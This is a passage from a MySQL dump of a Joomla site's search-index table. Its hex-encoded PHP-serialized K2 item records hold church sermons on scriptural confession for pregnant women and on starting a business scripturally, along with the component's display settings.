20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a313a2233223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a31343a2246616d696c79202620576f6d656e223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a32343a2233363a7363726970747572616c2d636f6e66657373696f6e223b733a373a22636174736c7567223b733a31343a22363a66616d696c792d776f6d656e223b733a363a22617574686f72223b733a32353a2252657620284d727329204f79656e696b65204172656f67756e223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a34323a22636f6d706f6e656e742f6b322f6974656d2f33362d7363726970747572616c2d636f6e66657373696f6e223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a32353a2252657620284d727329204f79656e696b65204172656f67756e223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a32353a2252657620284d727329204f79656e696b65204172656f67756e223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a31343a2246616d696c79202620576f6d656e223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a31343a2246616d696c79202620576f6d656e223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3336223b733a353a22726f757465223b733a36313a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d33363a7363726970747572616c2d636f6e66657373696f6e223b733a353a227469746c65223b733a34303a225363726970747572616c20436f6e66657373696f6e20666f7220507265676e616e7420576f6d656e223b733a31313a226465736372697074696f6e223b733a3436313a2220e2809c4d616b65207468657365207363726970747572657320796f7572206461696c7920636f6e66657373696f6e206174206c6561737420332074696d6573206461696c792d206d6f726e696e672c2061667465726e6f6f6e20616e64206576656e696e672e2049742063616e206265206d6f7265212028596f752063616e206576656e207374617274206265666f726520707265676e616e6379292ee2809d2047656e2e20343a3120e2809320e2809c416e64204164616d206b6e6577204576652068697320776966653b20616e642073686520636f6e6365697665642c20616e64206265617273204361696e2c20616e6420736169642c2049206861766520676f7474656e2061206d616e2066726f6d20746865204c6f72642ee2809d2047656e2e20343a31372c2047656e2e2031363a342c2047656e2e2032393a33322c2033332c2033342c2033353b2047656e2e2033303a352c20373b2047656e2e2033303a32333b2045782e323a32392e204920636f6e636569766520616e64204920626172652c206e6f206d6973636172726961676520696e204a65737573206e616d652e2045766572796f6e6520636f6e63656976656420616e6420626172652c20736f20646f20492e20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30332d32332031363a33383a3537223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031372d30332d32332031363a33383a3537223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(193, 'index.php?option=com_k2&view=item&id=12', 'index.php?option=com_k2&view=item&id=12:business', 'How to Start a Business Scripturally', ' Text: Proverbs 3:9-10, 10:22, Deuteronomy 28:8, 26:1-2, Leviticus 27:30, II Chronicles 31:5. INTRODUCTION God\'s expectation for his people is that they will lend to many nations and not borrow, they will be employers of labor with multiple streams of income. It is not enough to have a paying job or a salary job; you need to make more room for the blessings of God that are due upon your life through multiple streams of income. ', '2017-05-03 00:24:26', 'ef6f9d708bee609a9da52a9c7c1c4314', 1, 1, 1, '*', '2017-01-01 11:28:56', '0000-00-00 00:00:00', '2017-01-01 11:28:56', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223132223b733a353a22616c696173223b733a383a22627573696e657373223b733a373a2273756d6d617279223b733a3530353a223c703e546578743a20c2a050726f766572627320333a392d31302c2031303a32322c20c2a0204465757465726f6e6f6d7920c2a032383a382c2032363a312d322c204c65766974696375732032373a33302c20c2a04949204368726f6e69636c657320c2a033313a352e3c2f703e0d0a3c703e3c7374726f6e673e494e54524f44554354494f4e3c2f7374726f6e673e3c2f703e0d0a3c703e476f64277320c2a06578706563746174696f6e20c2a0666f722068697320c2a070656f706c6520c2a06973207468617420746865792077696c6c206c656e6420c2a0746f206d616e79206e6174696f6e7320616e64206e6f7420626f72726f772c20746865792077696c6c20626520656d706c6f79657273206f66206c61626f722077697468206d756c7469706c6520c2a073747265616d73206f6620696e636f6d652e20c2a020497420c2a06973206e6f7420656e6f75676820746f2068617665206120706179696e67206a6f62206f7220612073616c61727920c2a06a6f623b20796f75206e65656420746f206d616b65206d6f726520726f6f6d20666f722074686520626c657373696e677320c2a06f6620476f64207468617420c2a0617265206475652075706f6e20796f7572206c696665207468726f756768206d756c7469706c652073747265616d73206f6620696e636f6d652e3c2f703e0d0a223b733a343a22626f6479223b733a363732383a220d0a3c703e596f752073686f756c6420c2a066696e64206f7574207768617420627573696e65737320c2a074686520c2a04c6f726420c2a077616e747320c2a0796f7520746f20656e6761676520c2a0696e20736f207468617420796f752077696c6c206e6f742067657420696e766f6c76656420696e20747269616c20616e64206572726f7220c2a0616e6420746875732c206d616b6520726f6f6d20666f72207468652065787072657373696f6e20c2a06f6620476f64277320c2a0626c657373696e672075706f6e20796f7572206c6966652e3c2f703e0d0a3c703e546865726520697320612077617920746f20737461727420c2a0616e6420646f20627573696e65737320c2a07363726970747572616c6c7920746861742077696c6c20636f6e6e65637420796f7520746f20746865206162756e64616e636520c2a07468617420c2a0697320617661696c61626c6520696e20476f642773206b696e67646f6d20616e6420746865726520c2a0697320616c736f20c2a0612077617920746f20646f20627573696e65737320c2a06f7264696e6172696c7920c2a0746861742077696c6c206d616b6520796f7520746f20686176652074686520636f6d6d6f6e20c2a06f7574636f6d6520c2a07468617420c2a06576657279206f7468657220c2a06e61747572616c20c2a06d616e20697320686176696e6720616e64206576656e20736f6d6574696d657320c2a06661696c757265732e20c2a020427574206d617920796f7520636f6e6e65637420746f2074686520c2a06162756e64616e636520c2a07468617420c2a0697320617661696c61626c6520c2a0696e20476f642773206b696e67646f6d20696e204a6573757320c2a06e616d652e3c2f703e0d0a3c703e4c657420757320636f6e73696465722074686520666f6c6c6f77696e6720737465707320746861742077696c6c2068656c7020796f753a3c2f703e0d0a3c703e3c7374726f6e673e312e20444956494e4520c2a0494445413a3c2f7374726f6e673e204c657420796f757220627573696e65737320c2a0626520616e206964656120c2a066726f6d20746865204c6f72642e20c2a0446f6e2774206a757374207069636b20c2a06120627573696e65737320c2a069646561206265636175736520c2a069742069732066616d6f757320c2a06f7220c2a06265636175736520c2a07468617420c2a069732077686174206576657279626f647920c2a0697320646f696e672e20474554204120574f52442046524f4d20544845204c4f52442c20746861742077696c6c20626520746865207363726970747572616c2067726f756e64207468617420796f7520617265207374616e64696e6720c2a075706f6e2c20446f6e2774207069636b20616e206964656120c2a066726f6d20796f757220656e7669726f6e6d656e742c20c2a072617468657220c2a07761697420c2a075706f6e20746865204c6f726420616e64206c657420c2a0476f642077686f206b6e6f77732074686520667574757265206769766520796f75206120646972656374696f6e20746861742077696c6c206c65616420796f7520746f20796f7572207765616c74687920706c6163652e3c2f703e0d0a3c703e612e5768656e20476f6420676976657320796f7520616e2069646561206865206578706563747320796f7520746f206f70657261746520697420617420746865206c6576656c206f6620476f642c20c2a0657863656c6c656e6365206973206e6f74206e65676f746961626c652e20c2a0446f206e6f742065766572206f706572617465206120646976696e65206964656120c2a061742061206d6564696f637265206c6576656c2e20416e7920627573696e6573732069646561207468617420796f752061726520657865637574696e672c20646f2069742077656c6c2c206974277320676f696e6720676c6f62616c2c20c2a06f70657261746520c2a0696e206120676c6f62616c206d696e6473657420c2a0616e642064696d656e73696f6e2e20c2a020466f72206578616d706c652c20476f6420c2a0676976657320796f75206120627573696e65737320c2a069646561206f6e2067726f756e646e75742c20c2a0697420697320c2a06e6f7420666f7220796f7520746f2073746172742070757474696e672067726f756e646e757420696e20666976652d6e6169726120c2a07472616e73706172656e7420c2a0206e796c6f6e20616e64207361792c616e6420796f752061726520776f726b696e67206120646976696e6520696465612c206174207468697320c2a06c6576656c20c2a06f6620796f757220747261696e696e6720c2a0696e20c2a0476f642e20596f752073686f756c6420626567696e20746f2066696e64206f757420776861742061726520746865207468696e677320796f752063616e206d616b652066726f6d2067726f756e646e75742c206c696b6520c2a0686f6d656d61646520c2a0207065616e757420c2a0206275747465722c20c2a067726f756e646e757420c2a07370726561642c20c2a0616e6420c2a077686f6c6573616c657320737570706c7920c2a06f6620616c6c20666f726d73206f662067726f756e646e7574202e2e2e205468696e6b20c2a06269672120c2a05468696e6b206772616e642120c2a05468696e6b20c2a0616e642066756e6374696f6e20c2a0617420746865206c6576656c20c2a06f6620476f642e3c2f703e0d0a3c703e622e457665727920696465612066726f6d20476f642077696c6c20626520626c6573736564206f6620476f64206966796f7520776f726b6f757420c2a07468652064657461696c732e3c2f703e0d0a3c703e632e5072657061726520c2a077656c6c2e20c2a04c657420c2a0796f7572207072657061726174696f6e20c2a020626520617420746865206c6576656c20c2a06f6620476f642c20776861742077696c6c206c617374206d7573742062652074686f726f7567686c7920707265706172656420c2a0666f722e3c2f703e0d0a3c703e642e596f7520c2a073686f756c6420737461727420c2a0776974682073706972697475616c20c2a0207072657061726174696f6e2e20c2a020426972746820697420666f72746820696e207072617965722e3c2f703e0d0a3c703e4265666f726520796f752073746172742074656c6c696e6720c2a070656f706c6520c2a0736f6d657468696e672c20626520737572652069742069732065737461626c69736865642e3c2f703e0d0a3c703e3c7374726f6e673e322e20534f57204120434f4d4d454e5355524154452054414b4520c2a04f464620534545442041542054484520424547494e4e494e47204f4620594f555220425553494e4553533a3c2f7374726f6e673e3c2f703e0d0a3c703e5769746820c2a0612070726f70657220c2a0756e6465727374616e64696e6720c2a0206f662061206b696e67646f6d2073797374656d20736f77696e6720796f757220736565642077696c6c20636f6e6e65637420796f757220627573696e65737320c2a0746f206120726970706c6520c2a06f6620646976696e6520666c6f777320616e6420686172766573742e20486f7720796f7520737461727420c2a0697320616c77617973206372756369616c2e20c2a0596f752063616e277420c2a0706c616e20c2a0746f2073746172742061207472616e73706f727420c2a0636f6d70616e7920616e6420796f7572207374617274696e6720c2a07365656420c2a0697320c2a0333530206e616972612c20c2a07768617420796f75206861766520646f6e65206973207468617420796f75206861766520647261776e20c2a061206c696d6974696e6720c2a06c696e6520c2a0746f2074686520657870616e736520c2a0616e6420c2a02c6d61676e697475646520c2a0206f66207768617420594f555220425553494e45535320c2a043414e204245434f4d452e20c2a05748454e20c2a0594f5520534f5720594f555220c2a0534545442c20c2a0796f7520736f7720636f6d6d656e73757261746520c2a0746f2074686520667574757265207468617420476f6420686173206561726d61726b656420c2a0666f722074686520627573696e6573732e3c2f703e0d0a3c703e3c7374726f6e673e332e2054414b452054484520414e4f494e54494e4720414c4f4e473a3c2f7374726f6e673e3c2f703e0d0a3c703e5265636569766520696d706172746174696f6e20c2a0666f7220796f757220627573696e65737320c2a0616e64206265207375726520796f752061726520612070726f70657220736f6e20696e2074686520686f75736520736f20746861742074686520616e6f696e74696e672077696c6c20666c6f77206566666f72746c6573736c7920696e746f20796f757220616666616972732e3c2f703e0d0a3c703e3c7374726f6e673e342e204c455420c2a0474f44204749564520594f5520544845204e414d45204f4620594f555220425553494e4553533a3c2f7374726f6e673e3c2f703e0d0a3c703e4e616d6520c2a020796f757220c2a020627573696e65737320c2a020c2a0627920c2a0696e737069726174696f6e20c2a020c2a0206e6f7420c2a020627920c2a0656e7669726f6e6d656e74616c207065726d75746174696f6e2e20c2a0446976696e65206e616d65732077696c6c20616c77617973206472617720646976696e65206661766f722e3c2f703e0d0a3c703e3c7374726f6e673e352e205052455353204655525448455220c2a0494e205448452050524553454e434520c2a04f4620474f4420464f5220444956494e452053544550532e3c2f7374726f6e673e3c2f703e0d0a3c703e5072657373206675727468657220c2a0696e2070726179657220616e64206c65742074686520486f6c7920c2a0537069726974206272696e6720696e737472756374696f6e7320c2a0746f20796f757220c2a0686561727420c2a06f6e2074686520737465707320c2a0746f2074616b652e20416c736f2c20c2a0707265737320c2a06675727468657220c2a0696e2066696e64696e67206f75742064657461696c732061626f757420c2a074686520627573696e6573732e20c2a0204d616b6520c2a07375726520c2a0796f7520646f206e6f7420737061726520c2a0696e20736561726368696e6720c2a0666f7220696e666f726d6174696f6e20c2a020616e642064657461696c732066726f6d206576657279206e656365737361727920717561727465722e3c2f703e0d0a3c703e3c7374726f6e673e362e20504152544e455220c2a0594f555220425553494e45535320c2a0574954482054484520414e4f494e54494e4720414e442054484520564953494f4e3c2f7374726f6e673e3c2f703e0d0a3c703e506172746e6572696e6720c2a0776974682074686520766973696f6e20616e642074686520616e6f696e74696e6720c2a077696c6c20616c77617973207365637572652074686520667574757265206f6620796f757220627573696e6573732e204d616b65207375726520697420697320636f6e7374616e7420616e6420726567756c61722e20c2a0497420636f756c642062652061206365727461696e20c2a070657263656e74616765206f6620796f757220696e636f6d65207468617420796f7520616c7761797320c2a073657420617369646520746f20706172746e657220c2a07769746820c2a074686520766973696f6e2e20c2a0427920736f20646f696e6720c2a0796f7520656e6761676520c2a074686520666f726365206f66207468652063616c6c696e6720616e642074686520766973696f6e20c2a0746f20636f6d6d616e6420616c77617973206120626c657373696e6720696e2074686520646972656374696f6e206f6620796f757220627573696e6573732e3c2f703e0d0a3c703e506172746e6572207769746820476f64206f7665722074686520627573696e65737320726567756c61726c7920c2a0627920736f77696e672073656564732e2054686572653c2f703e0d0a3c703e617265207468726565207468696e6773207468617420796f7520736f77202f6769766520746f2c207468657365206172653b3c2f703e0d0a3c756c3e0d0a3c6c693e74686520776f726b206f6620476f643c2f6c693e0d0a3c6c693e74686520686f757365206f6620476f64c2a03c2f6c693e0d0a3c6c693e746865206d616e206f6620476f643c2f6c693e0d0a3c2f756c3e0d0a3c703e3c7374726f6e673e372e20424520c2a0464149544846554c20c2a0205749544820594f555220464952535420465255495420534545442c205448495320c2a04953204352554349414c2e3c2f7374726f6e673e3c2f703e0d0a3c703e444f204e4f542045415420594f55522046495253542046525549542e20c2a05468656e2c20c2a0616c7761797320686f6e6f7220746865206c6f726420c2a07769746820746865206669727374206672756974206f662074686520696e637265617365206f6620796f757220627573696e6573732e3c2f703e0d0a3c703e596f75722066697273742066727569742077696c6c20646f207468726565207468696e67733a3c2f703e0d0a3c703e612e20497420c2a077696c6c20656e7375726520c2a0636f6e74696e756974793a20c2a06e6f20656e7669726f6e6d656e74616c20c2a0636f6e646974696f6e20c2a063616e2064727920757020796f757220627573696e657373206265636175736520697420697320706f77657265642066726f6d20612068696768657220636f76656e616e742e20622e6c74656e737572657320c2a0696e6372656173696e6720c2a070726f6d6f74696f6e2e3c2f703e0d0a3c703e632e206c74207365637572657320796f757220706c61636520c2a0696e206162756e64616e63652e3c2f703e0d0a3c703e3c7374726f6e673e382e20454e53555245205448415420594f5520415245204120464149544846554c205449544845522e3c2f7374726f6e673e3c2f703e0d0a3c703e50617920796f757220746974686520726567756c61726c7920c2a0616e6420706172746963756c61726c7920c2a0746865206669727374206f6e652074656e74682074656e7468206f6620796f757220696e636f6d6520616e64206e6f74206f6e652074656e746820c2a06f6620796f757220696e636f6d652e204173206120666169746866756c2074697468657220796f752061637469766174652074686520636f76656e616e742074686174206465766f7572657220c2a0697320726562756b656420c2a0666f7220796f75722073616b652c206e6f7468696e672063616e2065617420757020796f757220627573696e6573732e3c2f703e0d0a3c703e3c7374726f6e673e392e20444f204e4f54204c494d495420594f555253454c4620494e205448452053434f5045204f4620594f555220425553494e4553532e3c2f7374726f6e673e3c2f703e0d0a3c703e4c657420476f6420626520746865206f776e65722077686f206472617773207468652073636f706520616e64206469726563747320c2a06974207768696c6520796f7520617265207468652073746166662e20c2a050555420594f555253454c4620c2a04f4e20412053414c415259205343414c4520696e20796f757220627573696e6573732e20534550415241544520c2a0594f555253454c4620c2a046524f4d20c2a05448415420425553494e4553532c20c2a020444f204e4f5420415353554d45205448415420414c4c20544845204d4f4e455920c2a0495320594f5552204f574e2e3c2f703e0d0a3c703e3c7374726f6e673e31302e2046554c46494c4c20414c4c205249474854454f55534e4553532e3c2f7374726f6e673e3c2f703e0d0a3c703e466f6c6c6f7720c2a0616c6c206e656365737361727920c2a070726f6365647572657320c2a0616e642070726f63657373657320c2a0746861742077696c6c206c65676974696d697a6520796f757220c2a0627573696e6573732e20c2a020446f6e277420c2a063757420636f726e6572732c20c2a02070617920796f757220c2a0656d706c6f7965657320c2a0616e6420c2a0646f6e277420636865617420796f757220637573746f6d6572732e3c2f703e0d0a3c703e3c7374726f6e673e31312e2042452050524159455246554c20414e4420424520564947494c414e542e3c2f7374726f6e673e3c2f703e0d0a3c703e446f206e6f7420616c6c6f7720c2a06f72206769766520726f6f6d20666f72206f6363756c74696320696e2d726f61647320c2a06f722061747461636b732e20446f6e277420c2a0626520636172656c65737320c2a0207375636820c2a07468617420c2a0796f7520c2a06f70656e20c2a0796f757273656c6620c2a020757020c2a0746f20c2a06f6363756c74696320c2a061747461636b2e20c2a0426520776174636866756c3b20646f6e2774206c657420627573696e65737320c2a02074616b6520796f7520617761792066726f6d20476f642e2041732074686520627573696e6573732067726f777320c2a077696465722c20796f75206e65656420c2a0746f206265206d6f726520c2a070726179657266756c2c20c2a06d6f726520c2a073656e73697469766520c2a0616e64207374726f6e6765722e20596f752063616e6e6f74206166666f726420746f206a6f6b6520616e642074616b65206c696768746c7920796f75722073706972697475616c20c2a06c696665206265636175736520746865207769646572207468652073636f7065206f6620796f757220627573696e65737320c2a0746865206d6f726520696d706f7274616e746c7920796f752074616b6520796f757220707261796572206c6966652e3c2f703e0d0a3c703e3c7374726f6e673e434f4e434c5553494f4e3c2f7374726f6e673e3c2f703e0d0a3c703e4c6561726e20c2a0746f20c2a072756e20c2a0796f757220c2a0627573696e65737320c2a020696e2074686520c2a06b696e67646f6d20c2a07761792c207769746820c2a06b696e67646f6d207072696e6369706c657320c2a0616e64206b696e67646f6d207374616e646172647320c2a0616e6420626567696e20746f20656e6a6f79206f7574636f6d657320c2a0696e20746865207265616c6d20c2a06f66206162756e64616e63652e3c2f703e0d0a3c703ec2a03c2f703e0d0a3c703ec2a03c2f703e0d0a3c703ec2a03c2f703e0d0a3c703ec2a03c2f703e223b733a353a226361746964223b733a313a2234223b733a31303a22637265617465645f6279223b733a333a22313936223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031372d30352d30332030303a32343a3235223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a226f72646572223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2230223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616